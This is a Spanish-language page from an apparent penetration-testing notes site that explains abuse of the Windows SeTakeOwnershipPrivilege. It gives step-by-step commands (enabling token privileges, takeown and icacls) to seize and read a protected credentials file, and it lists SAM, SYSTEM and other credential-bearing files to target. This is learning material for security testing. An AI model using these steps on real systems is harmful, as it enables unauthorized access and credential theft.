d4redevil
  • whoami
  • Active Directory
    • Enumeración
    • PowerShell para gestionar Active Directory
    • PowerView & SharpView
    • Ataques a Kerberos
    • Ataque de contraseñas
    • SMB Relay
    • Token Impersonation
    • Golden Ticket
    • LLMNR Poisoning
    • Mimikatz
    • Grupos privilegiados
    • LAPS
  • Linux
    • Enumeración
    • Escalación de privilegios
    • Transferencia de Archivos
  • Windows
    • Enumeración
    • Escalación de privilegios
      • SeImporsonate
      • SeDebugPrivilege
      • SeTakeOwnershipPrivilege
      • Backup Operators
      • DnsAdmins
    • Transferencia de Archivos
  • Scripting
    • Powershell
      • Introducción
      • Cmdlet
      • Alias
      • Comentarios
      • Comandos utiles
      • Variables
      • Tuberías (Pipes)
      • Operaciones
      • Estructuras Condicionales
  • OWASP TOP 10 y Vulnerabilidades Web
    • Inyecciones SQL
      • ¿Qué son las Inyecciones SQL?
      • Laboratorio
      • Inyecciones SQL basada en Uniones
      • Inyecciones SQL basadas en booleanos
      • Inyecciones SQL basadas en tiempo
  • Writeups
    • Hack The Box
      • Linux
        • 🟢Easy
        • 🟡Medium
          • Zipping
        • 🔴Hard
        • ⚫Insane
      • Windows
        • 🟢Easy
          • Devel
          • Grandpa
          • Granny
          • Jerry
          • Optimum
          • Legacy
          • Active
          • Sauna
        • 🟡Medium
        • 🔴Hard
        • ⚫Insane
    • The Hackers Labs
      • Linux
        • 🟢Principiante
          • Papaya
          • Can You Hack Me?
        • 🟡Avanzado
          • Runners
          • El Candidato
          • El Cliente
        • 🔴Profesional
        • ⚫Experto
          • ⚫Thlcppt_v16
      • Windows
        • 🟢Principiante
          • Cocido Andaluz
          • Ensalá Papas
        • 🟡Avanzado
        • 🔴Profesional
          • BlackGold
        • ⚫Experto
    • Dockerlabs
      • 🔵Muy fácil
      • 🟡Fácil
      • 🟠Medio
        • Database
      • 🔴Difícil
    • VulnHub
      • Linux
        • 🟢Easy
        • 🟡Medium
        • 🔴Hard
      • Windows
        • 🟢Easy
        • 🟡Medium
        • 🔴Hard
    • HackMyVM
      • Linux
        • 🟢Easy
        • 🟡Medium
        • 🔴Hard
        • ⚫Insane
      • Windows
        • 🟢Easy
        • 🟡Medium
        • 🔴Hard
        • ⚫Insane
  • Servicios Comunes
    • TCP
    • UDP
    • FTP (21)
    • SMB (445)
    • MySQL (3306)
    • MSSQL (1433)
  • Cheatsheet
    • Reconocimiento
    • Enumeración
    • Enumeración Web
    • Enumeración de CMS
    • Fuerza Bruta
    • Pivoting
    • Msfvenom
    • Utilidades
    • Fuerza bruta
    • Transferencia de Archivos
  • Contenedores
    • Docker
Con tecnología de GitBook
En esta página
  • Abusando del privilegio
  • Revisión de los privilegios del usuario actual
  • Habilitación del privilegio SeTakeOwnership
  1. Windows
  2. Escalación de privilegios

SeTakeOwnershipPrivilege

AnteriorSeDebugPrivilegeSiguienteBackup Operators

Última actualización hace 4 meses

El privilegio SeTakeOwnershipPrivilege concede a un usuario la capacidad de tomar posesión de cualquier "objeto protegido", lo que incluye objetos de Active Directory, archivos y carpetas NTFS, impresoras, claves del registro, servicios y procesos. Este privilegio otorga derechos WRITE_OWNER sobre un objeto, permitiendo al usuario modificar el propietario en el descriptor de seguridad del objeto. Por defecto, los administradores tienen este privilegio.

Abusando del privilegio

Revisión de los privilegios del usuario actual

PS C:\temp> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                                              State
============================= ======================================================= ========
SeTakeOwnershipPrivilege      Take ownership of files or other objects                Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                                Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set                          Disabled

Habilitación del privilegio SeTakeOwnership

Observe en el resultado que el privilegio no está habilitado. Podemos activarlo utilizando este , que se describe en publicación de blog, así como en artículo, que amplía el concepto inicial.

PS C:\temp> Import-Module .\Enable-Privilege.ps1
PS C:\temp> .\EnableAllTokenPrivs.ps1
PS C:\temp> whoami /priv

PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                              State
============================= ======================================== =======
SeTakeOwnershipPrivilege      Take ownership of files or other objects Enabled
SeChangeNotifyPrivilege       Bypass traverse checking                 Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set           Enabled

Supongamos que existe un archivo llamado creds.txt al que no podemos acceder. Sin embargo, podemos utilizar este derecho para tomar posesión del archivo, lo que nos permitirá obtener acceso completo al mismo.

El siguiente comando puede utilizarse para tomar posesión de cualquier archivo, otorgándonos control sobre el mismo.

takeown /f 'C:\Shares\PrivateFiles\Secret\creds.txt'

Pero todavía no podemos acceder y necesitamos modificar la ACL.

Otorgar a nuestro usuario privilegios completos sobre el archivo de destino.

icacls 'C:\Shares\PrivateFiles\Secret\creds.txt' /grant username:F

Cambiar username por el nombre de nuestro usuario.

Si todo ha salido según lo previsto, ahora podremos leer el archivo de destino desde la línea de comandos, abrirlo si tenemos acceso RDP, o copiarlo a nuestro sistema de ataque para realizar un procesamiento adiciona.

PS C:\temp> cat 'C:\Shares\PrivateFiles\Secret\creds.txt'

WEBADMIN admin
 
admin:sup3rs3cretPa$$word!

Algunos archivos locales de interés pueden incluir:

c:\inetpub\wwwwroot\web.config
%WINDIR%\repair\sam
%WINDIR%\repair\system
%WINDIR%\repair\software, %WINDIR%\repair\security
%WINDIR%\system32\config\SecEvent.Evt
%WINDIR%\system32\config\default.sav
%WINDIR%\system32\config\security.sav
%WINDIR%\system32\config\software.sav
%WINDIR%\system32\config\system.sav

script
esta
este